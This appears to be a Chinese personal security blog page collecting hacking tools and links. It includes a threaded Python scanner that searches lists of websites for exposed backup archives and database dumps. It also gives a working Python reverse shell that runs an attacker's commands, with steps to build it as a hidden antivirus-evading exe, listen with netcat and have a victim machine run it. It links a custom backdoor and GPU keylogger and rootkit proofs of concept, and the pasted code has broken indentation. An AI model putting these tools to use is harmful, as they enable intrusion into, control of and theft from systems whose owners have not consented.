AZ0NE

关于我

网络安全爱好者

https://github.com/az0ne/simple_zoomeye

当初做这个的时候用python收集数据的过程是很漫长的,前后经历了一个月,动用了三台阿里云服务器,为了数据的精准没有大规模的扫描,而是分段自动扫描,这个是V1版本的采用php+mysql 性能不是特别出色,等V2版本做全球全端口的会采用flask+mongodb+elasticsearch的构架来提高搜索的性能

好多时候需要木马的时候都是比较棘手,原因可能是被杀或者并不需要太多的功能,也许只是下载文件功能,或者搜集某种文件,于是我就定制了一个只有上传下载和搜寻指定文件格式的马,不多说代码传github了,方便大家看

https://github.com/az0ne/python_backdoor

免杀效果



直接用python pip安装

pip install arachnado

执行arachnado

打开浏览器访问 http://0.0.0.0:8888/

界面非常友好



好多人都应该用过传说中的马蜂窝的挖掘鸡,当年可火了,是批量扫源码的利器,现在好多都不能用了,我就用python写个玩玩

首先得把你收集的网址存在文件目录的host.txt文件里,最好写完整URL

我在测试的时候发现了问题,有些网站防爬虫会自动跳转,所以代码里检测文件只有大于1M的源码文件才会输出

补一下github地址:https://github.com/az0ne/digger

__author__ = 'AZONE'
import Queue
import urllib2
from threading import Thread
import sys
import httplib
import urlparse
def bThread(taget):
    SETTHREAD = 800
print '[Note] Running...\n'
threadl = []
    queue = Queue.Queue()
    hosts = taget
for host in hosts:
        queue.put(host)

    threadl = [tThread(queue) for x in xrange(0, int(SETTHREAD))]
for t in threadl:
        t.start()
for t in threadl:
        t.join()

class tThread(Thread):

def __init__(self, queue):
        Thread.__init__(self)
self.queue = queue

def run(self):
while not self.queue.empty():
            host = self.queue.get()
try:
#print host+":"+PORT1
requesturl(host)
except:
continue
taget =[]
fd = file( "host.txt", "r" )
for line in fd.readlines():
if line[0:4] == "http":
        taget.append(line.strip()+"/")
else:
        taget.append("http://"+line.strip()+"/")
print taget
print "[Note] Thread:800"
dirs = ["wwwroot.zip","wwwroot.rar","www.rar","www.zip","web.rar","web.zip","db.rar","db.zip","wz.rar","wz.zip","fdsa.rar","fdsa.zip","wangzhan.rar","wangzhan.zip","root.rar","root.zip","admin.rar","admin.zip","data.rar","gg.rar","vip.rar","1.zip","1.rar","2.zip","2.rar","config.rar","config.zip","/config/config.rar","/config/config.zip"]
def requesturl(taget):
for i in range(29):
        TURL = taget + dirs[i]
        request = urllib2.Request(TURL)
try:
            response = urllib2.urlopen(request)
back = response.read()
#print "[%d] => %s" %(response.code,TURL)
response.close()
            parsedurl = urlparse.urlparse(TURL)
            httpConn = httplib.HTTPConnection(parsedurl[1])
            httpConn.request('GET', parsedurl[2])
            responsed = httpConn.getresponse()
if responsed.status == 200:
                size = responsed.getheader('Content-Length')
                size = int(size) / 1024
if size > 1024:
print TURL+'\n'
print 'Size: %s KB' %size

except urllib2.HTTPError as error:
#print TURL+"ERROR!"
pass
bThread(taget)
sys.exit()

可以无视360

__author__ = 'AZONE'
import subprocess,socket
HOST = '服务器ip'
PORT = 443
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((HOST,PORT))
s.send('Hello !')
while 1:
    data = s.recv(1024)
if data == "quit":break
proc = subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
    stdoutput = proc.stdout.read() + proc.stderr.read()
    s.send(stdoutput)
s.send('Bye !')
s.close()

用pyinstaller打包成exe 参数 PyInstaller -F -w shell.py

在服务器上用NETCAT监听  netcat -l -p 443

让肉鸡运行刚刚生成的exe

每个国家都有一份洛丽塔的情节

美版洛丽塔:

一树梨花压海棠


韩版洛丽塔:

银娇



起因是想下载HackingTeam泄露的邮件,又由于种子各种不稳定,加上文件过大,所以就想换方法,国外放出了在线查询的地址 可惜是https的burp无力了,于是就想写个脚本跑一下,不然手工太麻烦了

PHP的代码

<?php


function curl_https($url, $data=array(), $header=array(), $timeout=30){


    $ch = curl_init();

    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 

    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, true);  

    curl_setopt($ch, CURLOPT_URL, $url);

    curl_setopt($ch, CURLOPT_HTTPHEADER, $header);

    curl_setopt($ch, CURLOPT_POST, true);

    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 

    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);


    $response = curl_exec($ch);


    if($error=curl_error($ch)){

        die($error);

    }


    curl_close($ch);


    return $response;


}

for ($x=0; $x<=111; $x++) {

  $id = "$x";

  $url = "https://wikileaks.org/hackingteam/emails/emailid/{$id}";

  print $url;

  $response = curl_https($url,5);


  $myF = fopen("D:\WWW\https\data\ $id.html", "w");

  fwrite($myF, $response);

  fclose($myF);


?>



https://github.com/d0lph1n98/Defeating-PHP-GD-imagecreatefromgif


GPU keylogger PoC by Team Jellyfish

https://github.com/x0r1/Demon 

GPU rootkit PoC by Team Jellyfish

https://github.com/x0r1/jellyfish 

© AZ0NE | Powered by LOFTER